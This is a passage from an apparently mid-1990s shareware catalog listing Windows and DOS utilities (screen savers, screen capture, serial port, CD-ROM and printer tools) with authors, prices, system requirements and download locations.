Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.10 (11-11-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; SVGA + monitor; Hard disk; VBRUN300.DLL. 256-color Windows video + driver. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, newsletter, mail support; bonus graphics; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: DMSDAY??.ZIP on BBSs; DMSDAY??.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 72330,1776 for + assistance). + SWREG#: 8462 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Windows photo screen saver featuring nuclear blast images in + true color. Ever felt like nuking your PC? Had such a bad day + you'd like the world to end? Try the DOOMSDAY screen saver! + Includes 3 images; registered version comes with 9 more. Screen + saver features 100 optional transition effects, picture border, + and other options. + + + Product: GTI Desktop+ + Enhancement/customization utilities. See full description on + page 115. + + Product: The Lights Go Down + Author: Thomas Hoevel Software-Development (Thomas Hoevel) + Version: 2.20 (07-07-95) + Needs: IBM AT (80286), Windows 3.0 or better. 2048k RAM; EGA + monitor; Hard disk. (Windows 3.0 must run in Protected [not + Real] Mode.). + Strongly recommended: SVGA monitor; Mouse; sound card. + Registration fee: US$25.00 (add US$4.00 for shipping to U.S. + addresses) (add US$4.00 for shipping to Canadian addresses) + (add US$4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; quick- + reference card; 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support; 1-month return policy; bonus + + Chapter 2, "Utilities" 65 + + + + utilities; all ASP-wide offers (see page 6); discounts on + upgrades. Bonus source code. + Look for: LIGHTS22.ZIP on BBSs; LIGHTOUT.ZIP on CompuServe in + CIS:PIKAPRO forum LIBrary 18 (or contact userID 100550,324 for + assistance). + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Screen saver collection with 28 modules with password and + randomizer. Tremendous graphics, great animations (e.g. Flying + Pigs), surprising special effects. Bitmap Show for .BMP & .JPG + files (sequentially for presentations or by random). Fractal + images with palette animation. Plus dice game and 2 utilities + (WinPulse: graphical display of CPU usage, WControl: exit or + re-start Windows easily). + + The German version WEEP was a winner in Ziff-Davis' European + Shareware Awards 1995 (Games category). + + + Product: Mystic Pixels + Author: Tesuji Technology (Ronald G. White) + Version: 1.1 (06-06-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $7.00 (add $3.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $10.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited CompuServe, mail + support; 3-month return policy; all ASP-wide offers (see + page 6); discounts on upgrades. + Look for: MSTPIX11.ZIP on BBSs; MSTPIX.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71500,3566 for + assistance). + SWREG#: 2853 + Download size: 20k (about two minutes with a 2400 baud modem) + Description: + A "kinder, gentler" Windows screen saver that slowly + manipulates pixels on the screen. It runs in one of ten + different modes that either move, recolor, or erase pixels. You + can pick a mode or allow it to randomly pick one each time it + starts. Some modes eventually fade the screen to black while + the others move or recolor the pixels originally on the screen. + + + Product: Photo Show 3D + Author: Progressive Logic (Keith A. Marshall) + Version: 2.01 (09-07-95) + Needs: IBM 80386, Windows 3.1 or better. 2048k RAM; SVGA + monitor. 386+. + Registration fee: $18.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 6 months of unlimited CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 66 + + + + disks of other shareware; discounts on upgrades. JPG image + support. + Look for: availability unknown on BBSs; PS3D.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 20 (or contact userID 73047,253 for + assistance). + SWREG#: 3243 + PsL#: 11590 + Download size: 240k (about 18 minutes with a 2400 baud modem) + Description: + A Windows screen saver that maps a BMP or PCX image to the + surface of a 3D object and tumbles it across the screen. The + object may be either a flat rectangle with the image on each + side, a cube with the image on all six sides, or a custom ball + shape with a user selectable number of facets. The image may be + either mapped around one half of the custom object or tiled + onto each facet. Great for logos and family photos! + + + Product: S.O.S. Personal Edition + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.1 (03-26-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; SOSPER??.ZIP on + CompuServe in CIS:ASPCD forum LIBrary 0 (or contact userID + 72330,1776 for assistance). + SWREG#: 3455 + Download size: 400k (about 30 minutes with a 2400 baud modem) + Description: + Customizable graphic screen saver for Windows. Displays four + user-definable bitmaps (.BMPs) slide-show fashion. Expandable + and upgradeable. PRO Version also available which supports + unlimited .PCX, .GIF, .JPG, etc. + + Chapter 2, "Utilities" 67 + + + + Product: Screen Saver Sampler + Author: Damsel Software Group, 603-485-2677 + Version: 2.0 (01-01-95) + Needs: IBM 80386, Windows 3.0 or better. 2000k RAM; VGA monitor; + Hard disk. + Strongly recommended: SVGA monitor; Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; printed + manual; 31/2" master disk(s); lifetime unlimited phone, fax, mail + support; all ASP-wide offers (see page 6); discounts on other + products. Bonus screen saver sampler. + Look for: availability unknown on BBSs. + Download size: 2500k (about 186 minutes with a 2400 baud modem) + Description: + Has 24 full-screen images best suited for 256-color VGA cards. + All images are 640 X 480 pixels. 6 images each are shown from + 4 major Damsel screen saver collections; New England + Wildflowers, New Hampshire Wilderness, the Big Sky Collection, + and the Damsel Surreal Art Collection. Screen display time + (approx 30 sec on a 486/33Mhtz) and transition effects are + hard-wired, but password protection and mouse aware/ignore + choices are included. + + + Product: Seascape + Author: Advanced Computer Tektonics (Alan Walworth), + 415-424-1401 + Version: 3.0 (12-02-95) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor. + Strongly recommended: Hard disk. + Registration fee: $24.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: availability unknown on BBSs; SEASCP.ZIP on CompuServe + in CIS:WINAV forum LIBrary 20 (or contact userID 71204,2226 for + assistance). + SWREG#: 8820 + Download size: 175k (about 13 minutes with a 2400 baud modem) + Description: + A screen saver which displays relatively realistic Pacific reef + fish swimming and eating, Seascape is distinguished by the + quality of its images and animation. Users' comments include + "Beautiful fish!", "The most enjoyable screen saver I've seen", + and "I love it!". Featured in Noah Matthews' Shareware column + as one of his favorite screen savers, and recommended as a + "Best Best" by PC Computing, Seascape has long been one of the + most-downloaded screen savers on both AOL and Compuserve. + + Chapter 2, "Utilities" 68 + + + + Product: Space Explorer Screen Saver + Author: Tay-Jee Software Corporation (Chuck Steenburgh), + 540-464-4310 + Version: 1.20 (11-12-95) + Needs: IBM 80386, Windows 3.1 or better. 4096k RAM; SVGA + monitor; Hard disk; VBRUN300.DLL. 256-color Windows video + driver. + Registration fee: $14.95 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited tollfree 800# phone, + fax, CompuServe, newsletter, mail support; bonus graphics; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. + Look for: SPACEX??.ZIP on BBSs; SPACEX??.ZIP on CompuServe in + CIS:ASPCD forum LIBrary 0 (or contact userID 72330,1776 for + assistance). + SWREG#: 8463 + Download size: 800k (about 60 minutes with a 2400 baud modem) + Description: + Windows 3.1 screen saver module with views of outer space. + Features 3 256-color photos, including night shuttle launch, + spiral galaxy, and moon landing. Installs through the Control + Panel. + + + Product: WinSecure + Author: ViewPoint Software, Inc., 714-777-8362 + Version: 2.0 (03-01-94) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $5.00 (add $2.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, CompuServe, mail support. + Look for: WINSEC20.ZIP on BBSs; WINSEC.ZIP on CompuServe in + CIS:WINFUN forum LIBrary 4 (or contact userID 71127,2610 for + assistance). + Download size: 390k (about 29 minutes with a 2400 baud modem) + Description: + Hot key from any Windows program and your personalized + screensaver appears instantly to hide your work. You have the + option to password protect your system. When you return to + continue work, enter your password and it shows you messages + left for you by others, any invalid password attempts, and + whether your PC has been rebooted. Step away from your desk in + style and security. Displays image after time delay and works + as default Windows desktop screen saver. + + + 2.3.3.3 Screen capture + + See also: Utilities, Printer utilities; Graphics, Utilities, + Graphic screen capture. + + Chapter 2, "Utilities" 69 + + + + Product: Capbuf + Author: Cascoly Software (Steve Estvanik), 206-523-6135 + Version: 1.41 (12-28-90) + Needs: IBM PC, DOS 3.3 or better. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $3.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of phone, CompuServe support. + Look for: availability unknown on BBSs; CAPBUF.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 3 (or contact userID 76703,3046 for + assistance). + Download size: 40k (about three minutes with a 2400 baud modem) + Description: + A memory resident (TSR) program that lets you capture any text + screen and save it for later processing or printing. It's quite + useful for programs that do not otherwise provide means of + printing their results: such as intermediate results of games, + or collecting copies of messages while on a bulletin board. + Also includes a filter to remove line drawing characters. + + + Product: GEMCAP + Author: Natural Software (Michael Allen), 708-377-7320 + Version: 4.02 (03-07-93) + Needs: IBM PC, DOS 3.0 or better. 4k RAM. + Registration fee: $35.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; 3-month + return policy; all ASP-wide offers (see page 6); disks of other + shareware. + Look for: availability unknown on BBSs; GEMCAP.ZIP on CompuServe + in CIS:WPUSER forum LIBrary 16 (or contact userID 70047,744 for + assistance). + Download size: 35k (about three minutes with a 2400 baud modem) + Description: + Captures DOS text and graphics screens to individual GEM .IMG + format bitmap files. Preserves reverse video and colors for + black and white printing. Retains high res VGA/EGA fonts so + your screens print exactly as they look to the user. Very + useful for software documentation. Works with CGA, VGA, EGA, + graphics modes, and any 80 column text mode - 43 & 50 line + modes. Captured files load in WordPerfect and other programs + that import GEM .IMG files. + + + Product: Quilt + Create intriguing patterns/scrn saver option. See full + description on page 511. + + Chapter 2, "Utilities" 70 + + + + Product: SCP + Author: Christopher J. Noyes Software (Christopher J. Noyes), + 718-625-2262 + Version: 1.04 (11-18-94) + Needs: IBM PC, DOS 2.1 or better. 384k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; EGA monitor; Hercules monitor. + Strongly recommended: VGA monitor; Dual 720k floppy drives; + Hard disk; HP DeskJet printer; HP LaserJet printer; Postscript + printer; Mouse; Epson printer; EMS memory; XMS memory. + Registration fee: $0.00 (Canadian dollars) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: SCP104.ZIP on BBSs (call 718-625-0411 to download it at + no charge); SCP104.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0 (or contact userID 71570,3055 for assistance). + Download size: 384k (about 29 minutes with a 2400 baud modem) + Description: + Captures DOS text screens and converts them to various graphic + file formats including .PCX .WPG .TIF .IMG. Allows changing + attributes and scaling. + + + Product: Textshot + Author: McAdams Associates (Craig McAdams), 214-239-9646 + Version: 4.0 (02-03-95) + Needs: IBM PC, DOS 2.1 or better. 23k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: TSHOT4.ZIP on BBSs; TSHOT.ZIP on CompuServe in + CIS:PCUTIL forum LIBrary 3 (or contact userID 70353,1644 for + assistance). + SWREG#: 5219 + PsL#: 11951 + Download size: 31k (about three minutes with a 2400 baud modem) + Description: + Saves images from any character-mode screen of 80 columns or + greater to color or B/W PCX graphics files as well as to + standard ASCII text files. When running on a VGA Textshot + accurately captures user-loaded fonts. Features: image + clipping, selectable fonts, image inversion and color patterns. + + + 2.3.4 286/386/486-specific + + Product: BOOT.SYS + The heavy-duty configuration manager. See full description on + page 102. + + Chapter 2, "Utilities" 71 + + + + Product: DAZZLE + EGA/VGA super-kaleidoscope, image generator. See full + description on page 488. + + Product: HiMOVE + Upper memory manager. See full description on page 56. + + 2.3.5 Sound card + + See also: Utilities, Hardware utilities, CD-ROM. + + Product: Music Sculptor for Windows + MIDI sequencer with music keyboard window. See full + description on page 552. + + 2.3.6 Serial & parallel port + + Product: Alad_IRQ + Lets GEnie Aladdin software use any IRQ. See full description + on page 360. + + Product: CTS Serial Port Utilities + Author: Computer Telecommunication Systems, Inc. (John Jerrim), + 404-263-8623 + Version: 1.2 (12-06-93) + Needs: IBM PC, DOS 2.1 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Registration fee: $30.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime phone, fax, CompuServe, GEnie, mail + support; bonus utilities; discounts on other products; + discounts on upgrades. 12-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: CTSSPU12.EXE on BBSs; CTSSPU.EXE on CompuServe in + CIS:PCCOM forum LIBrary 7 (or contact userID 76662,2315 for + assistance); CTSSPU12.EXE on GEnie in IBMPC forum LIBrary 5 (or + contact userID J.JERRIM for assistance). + SWREG#: 1750 + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A "must have" set of com port testing and control utilities for + consultants, PC support personnel, and anyone with a + communication problem. Detects common problems such as multiple + ports at the same address (eg: two Com1 ports), PCs which can't + use Com4, mouse/modem IRQ conflicts, shared IRQs, serial ports + which can't generate IRQs, and conflicting BIOS assignments. + Identifies all serial ports by UART type (including T/Ports and + emulated UARTs), address, and the actual IRQ used. + + Chapter 2, "Utilities" 72 + + + + Product: Serial File Copy + Author: MarshallSoft Computing, Inc., 205-881-4630 + Version: 3.5 (06-01-94) + Needs: IBM PC, DOS 2.0 or better. + Registration fee: $30.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, fax, BBS, mail + support; bonus utilities; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; SFC35.ZIP on CompuServe + in CIS:PCCOM forum LIBrary 2 (or contact userID 70671,1340 for + assistance). + PsL#: 10907 + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Copies files, including entire directory trees, between IBM PC + compatibles at 115,200 baud. Uses 16 bit CRC, has on-line help, + many transfer options. Can copy entire hard disk directory + structure from one PC to another at one time. + + + 2.3.7 CD-ROM + + See also: Utilities, Hardware utilities, Sound card. + + Product: CD-QUICK Cache + Author: Circuit Systems, 609-875-5433 + Version: 1.20 (06-12-95) + Needs: IBM AT (80286), DOS 3.1 or better. 11k RAM; CD-ROM drive; + XMS memory. + Registration fee: $29.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). Lifetime free upgrading allowed. + Look for: CDQCK120.ZIP on BBSs (call 609-764-0812 to download it + at no charge); CDQCK.ZIP on CompuServe in CIS:PCHW forum + LIBrary 1 (or contact userID 72202,3043 for assistance). + SWREG#: 4214 + PsL#: 11726 + Download size: 170k (about 13 minutes with a 2400 baud modem) + Description: + This small TSR will dramatically improve the performance of + your CD-ROM drive by storing frequently read data in fast XMS + memory. Uses advanced caching techniques and dynamic read-ahead + buffering to insure top performance. Includes CDTEST to measure + your CD-ROM drive's performance and the Windows' QUICKMON + program to show cache statistics in real time. Comes with an + easy-to-use INSTALL program, so you can be up and running in + less than 60 seconds! Works with any CD-ROM drive. + + Chapter 2, "Utilities" 73 + + + + Product: MicroPlayerCD(tm) + Author: Daniel Thomas, 714-524-5625 + Version: 1.03 (02-26-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2048k RAM; Hard + disk; Mouse; CD-ROM drive. + Strongly recommended: VGA monitor; sound card. + Registration fee: $20.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, CompuServe, mail + support; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MPCD10.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 6 (or contact userID 72301,2164 for + assistance). + SWREG#: 2081 + Download size: 210k (about 16 minutes with a 2400 baud modem) + Description: + Play audio CDs on your computer's CD-ROM. Control of screen + layout; optional vertical display. Resizable to virtually any + size: half the height of an icon to as large as your screen; + button-driven control of your CD player including eject and "go + to track"; disc catalog database; display track #, elapsed + time, disc name, track name; stay on top; volume control; auto + resume playing when Windows halts your CD in mid-play. + + + 2.3.7.1 Audio CDs + + Product: CD Wizzard CD Player for Win + Author: BFM Software, 810-661-1797 + Version: 4.03 (05-09-96) + Needs: IBM 80386, Windows 95 or better. 1000k RAM; VGA monitor; + Hard disk; Mouse; CD-ROM drive; sound card. CDROM Drive. + Registration fee: $19.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; lifetime + unlimited phone, BBS, CompuServe, newsletter, mail support; all + ASP-wide offers (see page 6); disks of other shareware; + discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; CDWIZ4.ZIP on CompuServe + in CIS:BLASTER forum LIBrary 3 (or contact userID 73770,1254 + for assistance). + SWREG#: 10573 + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + CD Wizzard is an audio CD player that includes all functions of + a home CD Player and more! It was selected as a FINALIST in + the Annual ZD Shareware awards! Check out the most complete CD + Player for Windows 95 and Windows NT 4.0. + * Play, pause, stop, eject, scan, track skip, etc. + * Self-updating Tray Icon + + Chapter 2, "Utilities" 74 + + + + * Disc Printing + * Real-time Graphic Output Meter + * Track sampling + + + 2.4 Printer utilities + + See also: Utilities, Hardware utilities, Screen, Screen + capture; Spreadsheet applications, Spreadsheet utilities; + Database applications, Mailing list systems; Graphics, + Utilities, Graphic print screen. + + Product: 2col + Author: ARCaine Technology, 510-527-9859 + Version: 9.5 (12-21-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; HP DeskJet printer; Epson + printer. + Registration fee: $22.95 (add $5.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + newsletter, mail support; 3-month return policy; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades; + registration commissions. 15-month free upgrading allowed. + Look for: availability unknown on BBSs; 2COL.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 72614,1451 for + assistance). + SWREG#: 1183 + Download size: 56k (about four minutes with a 2400 baud modem) + Description: + A compressed print utility for dotmatrix, ink/bubble/deskjet, + prints up to 8 pages on one side of a sheet of paper (or 16 + pages using both sides).Faster and more readable than other + compressed print programs.Great for shareware manuals and + reducing the bulk of paper stored or transported.Save $ when + faxing/mailing. Booklets/pamphlets.Prints 1-6 columns. MS- + Windows interface for TrueType printing. + + Chapter 2, "Utilities" 75 + + + + Product: Drag and Drop Printing + Author: FLFSoft Inc. + Version: v2.0 (02-01-94) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $15.00 (add $1.50 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of mail support; all ASP-wide offers + (see page 6); discounts on other products; discounts on + upgrades. 3-month free upgrading allowed. + Look for: DDP20.ZIP on BBSs; DDP20.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 75010,235 for + assistance). + PsL#: 11178 + Download size: 145k (about eleven minutes with a 2400 baud modem) + Description: + Simplifies printing most files under Windows 3.1. Printing a + file is as easy as dragging it from the file manager and + dropping it on the program icon. You have complete control over + all aspects of printing. You can set the margin lengths and + select between normal or sideways printing. Headings and/or + footers can be printed on each page. Features include simulated + duplex printing, "shell" printing of files and many other + features. + + + Product: E-report + Paperless management reports, COLD. See full description on + page 47. + + Product: Fonts Ink Fonts + Author: Software Co-op, 317-856-6052 + Version: 1 (01-04-93) + Needs: IBM AT (80286), Windows 3.1 or better. (Windows 3.1 + needed for TrueType fonts.). + Registration fee: $20.00 + Registration benefits: Master disks, phone support. Shareware + disks of other programs. + Look for: VARIOUS on BBSs (multiple files) (call 715-652-2758 to + download it at no charge). + Download size: 60k (about five minutes with a 2400 baud modem) + Description: + An interesting specialized selection of TrueType and PostScript + fonts: + FIKeys KeyCaps (3 styles) + FIBox Word-in-a-box (also white on black) + Fraction Fraction-making fonts + MadAve Solotype's Advertiser Gothic + Elite Prestige Elite (nbix) + FILCD 7-segment LCD (ni) + Torrance 9-pin dot matrix (nb) + FIArrows Arrows of all kinds + USBats Outlines of states, patriotic symbols + + Chapter 2, "Utilities" 76 + + + + Stencil Letters & numbers (2 styles) + + + Product: GridForm + Author: Software Co-op, 317-856-6052 + Version: 1.0 (12-15-91) + Needs: IBM PC, DOS 2.0 or better. HP LaserJet printer. + Registration fee: $15.00 + Registration benefits: Master disks, phone support, disks with + other shareware. + Look for: GRIDFORM.ZIP on BBSs (call 715-652-2758 to download it + at no charge); GRIDFM.ZIP on CompuServe in CIS:PCHW forum + LIBrary 2 (or contact userID 76635,1670 for assistance). + Download size: 27k (about two minutes with a 2400 baud modem) + Description: + Easy-to-use graph/gridpaper maker. Uses storable templates. + Metric or English units of measure. Linear, log, or natural log + scales. Full control over index lines. Can make highlighted + stripes or even checkerboards. Can make macro or overlay files + for printing later. + + + Product: JETCOL + Author: ARCaine Technology, 510-527-9859 + Version: 9.5 (12-21-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Hercules monitor; HP DeskJet printer; Epson + printer. + Registration fee: $32.95 (add $3.00 for shipping to U.S. + addresses) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, CompuServe, + newsletter, mail support; 3-month return policy; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades; + registration commissions. 15-month free upgrading allowed. + Look for: availability unknown on BBSs; JETCOL.ZIP on CompuServe + in CIS:PCHW forum LIBrary 2 (or contact userID 72614,1451 for + assistance). + SWREG#: 1196 + Download size: 85k (about seven minutes with a 2400 baud modem) + Description: + A compressed print utility for lasers. It prints up to 10 pages + on one side of a sheet of paper and 20 pages using both sides. + One of 10 soft fonts provided is automatically selected + according to amount of compression needed. Has features which + automate operation for best readability and appearance of + printout.Saves $ when faxing or mailing. Booklet printing,1-6 + columns. MS-Windows interface for TrueType printing. + + Chapter 2, "Utilities" 77 + + + + Product: LASR_MAN + A laser/ink jet printer with many styles. See full description + on page 86. + + Product: MicroFox DOS Utilities + DOS Utilities for Printers, screens, files. See full + description on page 27. + + Product: ON-SIDE + Author: Expressware Corporation, 206-788-0932 + Version: 2.0 (10-20-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor; Epson printer. + Registration fee: $24.95 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $23.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, BBS, + CompuServe, mail support; 2-month return policy; discounts on + other products; discounts on upgrades. 1-month free upgrading + allowed. + Look for: ONSIDE.ZIP on BBSs (call 206-788-4008 to download it at + no charge); ONSIDE.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 6 (or contact userID 75226,2020 for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + Easy-to-use sideways printing program. Ten font styles + included or create your own. Existing fonts can be edited using + the font editor. On-screen drawing makes the process easy. + Fonts can be magnified and stretched to over 25 sizes each. All + aspects of printing can be controlled: print can be double + struck for darker print, top and bottom can be set, character + width and height can be varied and letter spacing controlled. + + + Product: PrintGF + Author: Ravitz Software Inc. + Version: 1.26 (09-17-95) + Needs: IBM PC, DOS 3.0 or better. 384k RAM. + Registration fee: $34.00 + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime fax, BBS, CompuServe, mail support. JPEG/TARGA/TIFF + interpreter for Windows. + Look for: PRINTGF.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRINTGF.ZI on CompuServe in CIS:GRAPHSUP forum + LIBrary 8 (or contact userID 70431,32 for assistance). + PsL#: 11033 + Download size: 285k (about 21 minutes with a 2400 baud modem) + Description: + Provides an image printer (BMP, DCX, GIF, PCX, PNG, JPG, TGA, + TIF) for DOS and Windows. Prints or displays image files on 9 + and 24 pin printers, Canon BJ, BJC, Epson Stylus Color, Fargo + Primera, PrimeraPro, HP LaserJet, DeskJet, HP-RTL, PostScript, + + Chapter 2, "Utilities" 78 + + + + Star SJ-144, and many others, and displays on EGA, VGA, VESA + SVGA, HGC. Outputs color or b/w with user selectable size, + position, dithering, brightness, contrast, gamma, edge + smoothing, blur/sharpen, hue shift, and gray balance. + + + Product: PrintGL + Author: Ravitz Software Inc. + Version: 1.58 (09-17-95) + Needs: IBM PC, DOS 3.0 or better. 256k RAM. + Registration fee: $50.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime fax, BBS, CompuServe, mail support. + Look for: PRINTGL.ZIP on BBSs (call 606-268-0577 to download it + at no charge); PRINGTL.ZI on CompuServe in CIS:GRAPHSUP forum + LIBrary 2 (or contact userID 70431,32 for assistance). + PsL#: 10217 + Download size: 285k (about 21 minutes with a 2400 baud modem) + Description: + A pen plotter emulator package for DOS and Windows (includes + PrintCAD). It prints HP-GL, HP-GL/2, and ADI data on Epson and + IBM 9 pin printers, Epson, Fujitsu, IBM, NEC, and Toshiba 24 + pin printers, Canon BJ, BJC, Epson Stylus, HP LaserJet, + DeskJet, HP-GL, HP-GL/2, HP-RTL, PDP ProTracer, PostScript + printers, and many others, displays on CGA to VESA SVGA, and + outputs DCX, PCX, EPS files. User selectable pen width, color, + shading, and paper size, magnification, etc. + + + Product: Rubicon Publisher + Full-featured typesetter with fonts. See full description on + page 192. + + Product: SEE (File Viewer) + File viewer with full built-in mouse support. See full + description on page 51. + + Product: STEENBURGH's STUFF + 23 batch utilities, input, output, etc. See full description + on page 99. + + 2.4.1 Printer control + + Product: DMPLAS (Dot Matrix to LaserJet) + Translate IBM/Epson FX print to HP LaserJet. See full + description on page 85. + + Product: EnVision Publisher + Desktop publishing program (full-feature). See full + description on page 189. + + Chapter 2, "Utilities" 79 + + + + Product: EZSET + Author: McAdams Associates (Craig McAdams), 214-239-9646 + Version: 2.1 (12-05-93) + Needs: IBM PC, DOS 2.1 or better. 78k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $20.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; bonus utilities. + Look for: EZSET21.ZIP on BBSs; EZSET.ZIP on CompuServe in + CIS:PCHW forum LIBrary 2 (or contact userID 70353,1644 for + assistance). + Download size: 68k (about five minutes with a 2400 baud modem) + Description: + Lets you access all of your printer's features, including those + not available from the control panel. All you need to use it + effectively is your printer's manual. + + + Product: LQ + Author: Granny's Old-Fashioned Software, 704-264-6906 + Version: 2.35 (10-01-90) + Needs: IBM PC, DOS 2.0 or better. 9-pin dot matrix printer. + Registration fee: $35.00 + Registration benefits: Printed manual, master disks, update + disk, support, commissions. + Look for: availability unknown on BBSs; LQ235.ZIP on CompuServe + in CIS:PCHW forum LIBrary 2 (or contact userID 73577,230 for + assistance). + Download size: 240k (about 18 minutes with a 2400 baud modem) + Awards & nominations: 1987 winner, Public Brand Software + contests for useful programs. + Description: + Lets you obtains near-letter quality from 9-pin dot-matrix + printers in a variety of fonts. Works invisibly with your word + processor so you can continue to use familiar commands for + print options such as emphasized, underline, italics, etc. + Changing fonts can be done by inserting codes or by using LQ's + pop-up window. Customized spooler handles printing tasks + efficiently in the background. Also included: font editor, + banner printer, letterhead editor. + + + Product: PPRINT + Author: Patri-Soft (Norm Patriquin), 909-352-2820 + Version: 5.5 (11-22-91) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $24.00 + Registration benefits: 51/4" master disk(s); 3 months of BBS + support. 1-month return policy. + Look for: PPRINT55.ZIP on BBSs (call 909-352-2825 to download it + at no charge); PPRINT.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 6 (or contact userID 76347,2477 for assistance); + + Chapter 2, "Utilities" 80 + + + + PPRINT55.ZIP on GEnie in IBMPC-615 forum LIBrary 5 (or contact + userID 